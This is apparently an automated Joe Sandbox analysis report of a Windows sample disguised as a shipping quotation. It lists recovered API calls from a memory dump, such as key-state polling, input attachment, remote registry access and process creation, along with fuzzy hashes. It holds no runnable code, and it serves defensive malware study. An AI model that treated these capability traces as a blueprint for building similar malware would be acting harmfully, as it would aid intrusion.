                                                                            • LoadStringW.USER32(00000000,?,0067F7F8,00000001), ref: 00699745
                                                                            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00699866
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            APIs
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006907A2
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006907BE
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006907DA
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00690804
                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0069082C
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00690837
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0069083C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006A3D40
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 006A3D9D
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006A3DBE
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 006A3DCE
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006A3E55
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006A3E60
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006A3E6B
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                            • String ID: :$\$\??\%s
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006C403B
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 006C4042
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006C4055
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 006C405D
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 006C4068
                                                                            • DeleteDC.GDI32(00000000), ref: 006C4072
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006C407C
                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 006C4092
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 006C409E
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006BB1B0
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006BB1D4
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006BB214
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006BB236
                                                                              • Part of subcall function 006A05A7: GetStdHandle.KERNEL32(000000F6), ref: 006A05C6
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006BB3B6
                                                                            • GetLastError.KERNEL32(00000000), ref: 006BB407
                                                                            • CloseHandle.KERNEL32(?), ref: 006BB439
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BB44A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BB45C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BB46E
                                                                            • CloseHandle.KERNEL32(?), ref: 006BB4E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                             • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Handle$Close$Directory$CurrentSystem$CreateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 3101636085-0
                                                                            • Opcode ID: 02e56263aeb543862062e6b4c31e0650e2f65de44df1d22cdcf1c8172b3967d8
                                                                            • Instruction ID: 061f358cf239928e3d222a195b4a8708563c6a3d05bf3b8eeb254e8ba8d97655
                                                                            • Opcode Fuzzy Hash: 02e56263aeb543862062e6b4c31e0650e2f65de44df1d22cdcf1c8172b3967d8
                                                                            • Instruction Fuzzy Hash: 38F1AF715043409FC764EF24C891BAEBBE2AF85314F14945DF8998B3A2CB71EC85CB96
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 006A7AF3
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006A7B8F
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 006A7BA3
                                                                            • CoCreateInstance.OLE32(006CFD08,00000000,00000001,006F6E6C,?), ref: 006A7BEF
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006A7C74
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 006A7CCC
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 006A7D57
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006A7D7A
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 006A7D81
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 006A7DD6
                                                                            • CoUninitialize.OLE32 ref: 006A7DDC
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2762341140-0
                                                                            • Opcode ID: 872c5a6e113f1cd8d9890b04714798f36ac24fc1f8cf7edf610955ad2447b8eb
                                                                            • Instruction ID: 13d0a9dcf00ee6cf7f837721723d6bfd28fa714767c37ea539b6a9d5dfe3b589
                                                                            • Opcode Fuzzy Hash: 872c5a6e113f1cd8d9890b04714798f36ac24fc1f8cf7edf610955ad2447b8eb
                                                                            • Instruction Fuzzy Hash: AAC1F975A04109AFCB14EF64C884DAEBBFAFF49314B148499E91A9B361D730ED45CF90
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006C5504
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006C5515
                                                                            • CharNextW.USER32(00000158), ref: 006C5544
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006C5585
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006C559B
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006C55AC
                                                                            Similarity
                                                                            • API ID: MessageSend$CharNext
                                                                            • String ID:
                                                                            • API String ID: 1350042424-0
                                                                            • Opcode ID: dd73d6731fe306b8b4dffd040d55f5552888606e26678c470a451f2bc2ef4d9f
                                                                            • Instruction ID: 869389b50d4b31a259262f2df1bc5d634d47d5bb3bd0636491df7e8c0fbb72d8
                                                                            • Opcode Fuzzy Hash: dd73d6731fe306b8b4dffd040d55f5552888606e26678c470a451f2bc2ef4d9f
                                                                            • Instruction Fuzzy Hash: 49619E30900608EFDF109F55CD84EFE7BBAEF09720F508149F926AA291D774AAC1DB60
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0068FAAF
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0068FB08
                                                                            • VariantInit.OLEAUT32(?), ref: 0068FB1A
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0068FB3A
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0068FB8D
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 0068FBA1
                                                                            • VariantClear.OLEAUT32(?), ref: 0068FBB6
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 0068FBC3
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0068FBCC
                                                                            • VariantClear.OLEAUT32(?), ref: 0068FBDE
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0068FBE9
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: 65ae3575def0d162a88ab73e7b39bb49c1250ea545a4f426012634288aad16fa
                                                                            • Instruction ID: 8b98e514bdf25a97d41bff7474fdf00d1cccc891c2832a3c2a40394984b7dca9
                                                                            • Opcode Fuzzy Hash: 65ae3575def0d162a88ab73e7b39bb49c1250ea545a4f426012634288aad16fa
                                                                            • Instruction Fuzzy Hash: E5412E35A00219DFCB04EF64D854DAEBBBAFF48354F00C169E95AA7261DB30A946CF90
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00699CA1
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00699D22
                                                                            • GetKeyState.USER32(000000A0), ref: 00699D3D
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00699D57
                                                                            • GetKeyState.USER32(000000A1), ref: 00699D6C
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00699D84
                                                                            • GetKeyState.USER32(00000011), ref: 00699D96
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00699DAE
                                                                            • GetKeyState.USER32(00000012), ref: 00699DC0
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00699DD8
                                                                            • GetKeyState.USER32(0000005B), ref: 00699DEA
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 9848eed723c62b46e9448031dc30e05d3d966b9dab45f77ea63a203367427024
                                                                            • Instruction ID: c5d9c95824b1c90da0de24f2d68bfe571b89895d55df91045a8869fc0c409bd2
                                                                            • Opcode Fuzzy Hash: 9848eed723c62b46e9448031dc30e05d3d966b9dab45f77ea63a203367427024
                                                                            • Instruction Fuzzy Hash: 6C41F930504BC96DFF30876888443F5BEAA6F12354F44805EC6C656BC2EBA599C8C7B2
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[o
                                                                            • API String ID: 0-1026763703
                                                                            • Opcode ID: 344194cb0d9dccbdb69b5814ea6fe6eb82534bcafc038ff787199e9d0b06880b
                                                                            • Instruction ID: 3fe491a939d8a75e103ab7588193c444ef2df525510a2f8e683ea0f41c846498
                                                                            • Opcode Fuzzy Hash: 344194cb0d9dccbdb69b5814ea6fe6eb82534bcafc038ff787199e9d0b06880b
                                                                            • Instruction Fuzzy Hash: EBE10232A00526ABCF189FA8C4516FEBBBBBF04710F558129E556A7740DB30AF859790
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(00000000,00000000,006CCC08), ref: 006A4527
                                                                            • GetDriveTypeW.KERNEL32(?,006F6BF0,00000061), ref: 006A4743
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2426244813-1000479233
                                                                            • Opcode ID: 428c16ba93097b92b73611dd568c91a6ac9e11c073ba5d3aea5b8656112e93f2
                                                                            • Instruction ID: e239cd2bd8e6e8da7971b1330c796af71a2f4c8f9aa3f87565acf65311f612a4
                                                                            • Opcode Fuzzy Hash: 428c16ba93097b92b73611dd568c91a6ac9e11c073ba5d3aea5b8656112e93f2
                                                                            • Instruction Fuzzy Hash: 7AB1C1716083029BC710EF28C891AAAB7E7AFE6764F50491DF496C7391DBB0DC45CA92
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00694994
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 006949DA
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 006949F7
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00694A64
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00694A9D
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00694AE6
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00694B20
                                                                            • GetWindowRect.USER32(?,?), ref: 00694B8B
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                            • String ID: ThumbnailClass
                                                                            • API String ID: 3725905772-1241985126
                                                                            • Opcode ID: d96a9cb9be4b7bd72d25ab42aa497b17b703549082c82b5119c4d3beafc0cd44
                                                                            • Instruction ID: dfb48ef4093b8ffa059bb40225feb50dae36863d1bd420e7afca50f24386e1eb
                                                                            • Opcode Fuzzy Hash: d96a9cb9be4b7bd72d25ab42aa497b17b703549082c82b5119c4d3beafc0cd44
                                                                            • Instruction Fuzzy Hash: 4A917A711082059FDF04DF14C985FAA77EEEF84314F04846AED899A69ADF30ED46CBA1
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 006B05BC
                                                                            • inet_addr.WSOCK32(?), ref: 006B061C
                                                                            • gethostbyname.WSOCK32(?), ref: 006B0628
                                                                            • IcmpCreateFile.IPHLPAPI ref: 006B0636
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006B06C6
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006B06E5
                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 006B07B9
                                                                            • WSACleanup.WSOCK32 ref: 006B07BF
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            APIs
                                                                            • CoInitialize.OLE32 ref: 006B3774
                                                                            • CoUninitialize.OLE32 ref: 006B377F
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,006CFB78,?), ref: 006B37D9
                                                                            • IIDFromString.OLE32(?,?), ref: 006B384C
                                                                            • VariantInit.OLEAUT32(?), ref: 006B38E4
                                                                            • VariantClear.OLEAUT32(?), ref: 006B3936
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0069DC20
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0069DC46
                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0069DCBC
                                                                            Similarity
                                                                            • API ID: FileInfoVersion$QuerySizeValue
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                              • Part of subcall function 0064912D: GetCursorPos.USER32(?), ref: 00649141
                                                                              • Part of subcall function 0064912D: ScreenToClient.USER32(00000000,?), ref: 0064915E
                                                                              • Part of subcall function 0064912D: GetAsyncKeyState.USER32(00000001), ref: 00649183
                                                                              • Part of subcall function 0064912D: GetAsyncKeyState.USER32(00000002), ref: 0064919D
                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 006C8B6B
                                                                            • ImageList_EndDrag.COMCTL32 ref: 006C8B71
                                                                            • ReleaseCapture.USER32 ref: 006C8B77
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 006C8C12
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006C8C25
                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 006C8CFF
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#p
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006A33CF
                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006A33F0
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006A53A0
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006A5416
                                                                            • GetLastError.KERNEL32 ref: 006A5420
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 006A54A7
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            APIs
                                                                            • CreateMenu.USER32 ref: 006C3C79
                                                                            • SetMenu.USER32(?,00000000), ref: 006C3C88
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006C3D10
                                                                            • IsMenu.USER32(?), ref: 006C3D24
                                                                            • CreatePopupMenu.USER32 ref: 006C3D2E
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006C3D5B
                                                                            • DrawMenuBar.USER32 ref: 006C3D63
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                            • String ID: 0$F
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00691F64
                                                                            • GetDlgCtrlID.USER32 ref: 00691F6F
                                                                            • GetParent.USER32 ref: 00691F8B
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00691F8E
                                                                            • GetDlgCtrlID.USER32(?), ref: 00691F97
                                                                            • GetParent.USER32(?), ref: 00691FAB
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00691FAE
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00692043
                                                                            • GetDlgCtrlID.USER32 ref: 0069204E
                                                                            • GetParent.USER32 ref: 0069206A
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0069206D
                                                                            • GetDlgCtrlID.USER32(?), ref: 00692076
                                                                            • GetParent.USER32(?), ref: 0069208A
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0069208D
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 006B3C5C
                                                                            • CoInitialize.OLE32(00000000), ref: 006B3C8A
                                                                            • CoUninitialize.OLE32 ref: 006B3C94
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 006B3DB1
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 006B3ED5
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 006B3F0E
                                                                            • CoGetObject.OLE32(?,00000000,006CFB98,?), ref: 006B3F2D
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 006B3F40
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006B3FC4
                                                                            • VariantClear.OLEAUT32(?), ref: 006B3FD8
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2395222682-0
                                                                            • Opcode ID: f737ff67fbda0263baa47c6fd0922c53e3cf62182dceb205b8f99b60712e4415
                                                                            • Instruction ID: f001d77442bfea7753e560faf8a6abd281857101f897c375e09156661d3dae87
                                                                            • Opcode Fuzzy Hash: f737ff67fbda0263baa47c6fd0922c53e3cf62182dceb205b8f99b60712e4415
                                                                            • Instruction Fuzzy Hash: 42C135B16082119FD700DF68C8849ABBBEAFF89754F10491DF98A9B311DB30ED46CB52
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006C3A9D
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006C3AA0
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C3AC7
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006C3AEA
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006C3B62
                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 006C3BAC
                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 006C3BC7
                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 006C3BE2
                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 006C3BF6
                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 006C3C13
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            • Opcode ID: 7939209823d00089838a35427055975ecc8051f0adca3034fc4776b75c7d5432
                                                                            • Instruction ID: 4db7a3e85cffc2a39ff6946b7404a707786e4b8a0f72509b584924b3c2e4f299
                                                                            • Opcode Fuzzy Hash: 7939209823d00089838a35427055975ecc8051f0adca3034fc4776b75c7d5432
                                                                            • Instruction Fuzzy Hash: BD616775A00258AFDB10DFA8CC81EFE77B9EB09710F108199FA15A73A1C774AE41DB64
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0069B151
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B165
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0069B16C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B17B
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0069B18D
                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B1A6
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B1B8
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B1FD
                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B212
                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0069A1E1,?,00000001), ref: 0069B21D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: 04100650cb9ced095bbd767dd24f56cf5603d8b300540a452f776ff61e618913
                                                                            • Instruction ID: d91289aa0f4e603cf259cb3cc1460b4b9f03c6d95e8793a63cca268908e91bee
                                                                            • Opcode Fuzzy Hash: 04100650cb9ced095bbd767dd24f56cf5603d8b300540a452f776ff61e618913
                                                                            • Instruction Fuzzy Hash: 90318E71500204EFDF109F25EE48FBD7BAFEB51321F14A115FA05DA690DBB8AA418F64
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00631459
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 006314F8
                                                                            • UnregisterHotKey.USER32(?), ref: 006316DD
                                                                            • DestroyWindow.USER32(?), ref: 006724B9
                                                                            • FreeLibrary.KERNEL32(?), ref: 0067251E
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0067254B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: d3a4f19758c9e0ba21aaf3e3872e11479a2ba1daaababceabd7e1c778c77f82d
                                                                            • Instruction ID: 8c417c83dc779901ac33253be344cb22f0db9cd0f04abca3781e0b5ea036375c
                                                                            • Opcode Fuzzy Hash: d3a4f19758c9e0ba21aaf3e3872e11479a2ba1daaababceabd7e1c778c77f82d
                                                                            • Instruction Fuzzy Hash: 51D16B71701212CFDB29EF15C4A5B69F7A6BF06710F1482ADE44A6B352DB30AD12CF94
                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006A7FAD
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A7FC1
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 006A7FEB
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 006A8005
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8017
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8060
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006A80B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                            • String ID: *.*
                                                                            • API String ID: 769691225-438819550
                                                                            • Opcode ID: bff2d3d15a2a5d352b2da6999ca94aac420674b12dab03bbe01f391f0c6a3803
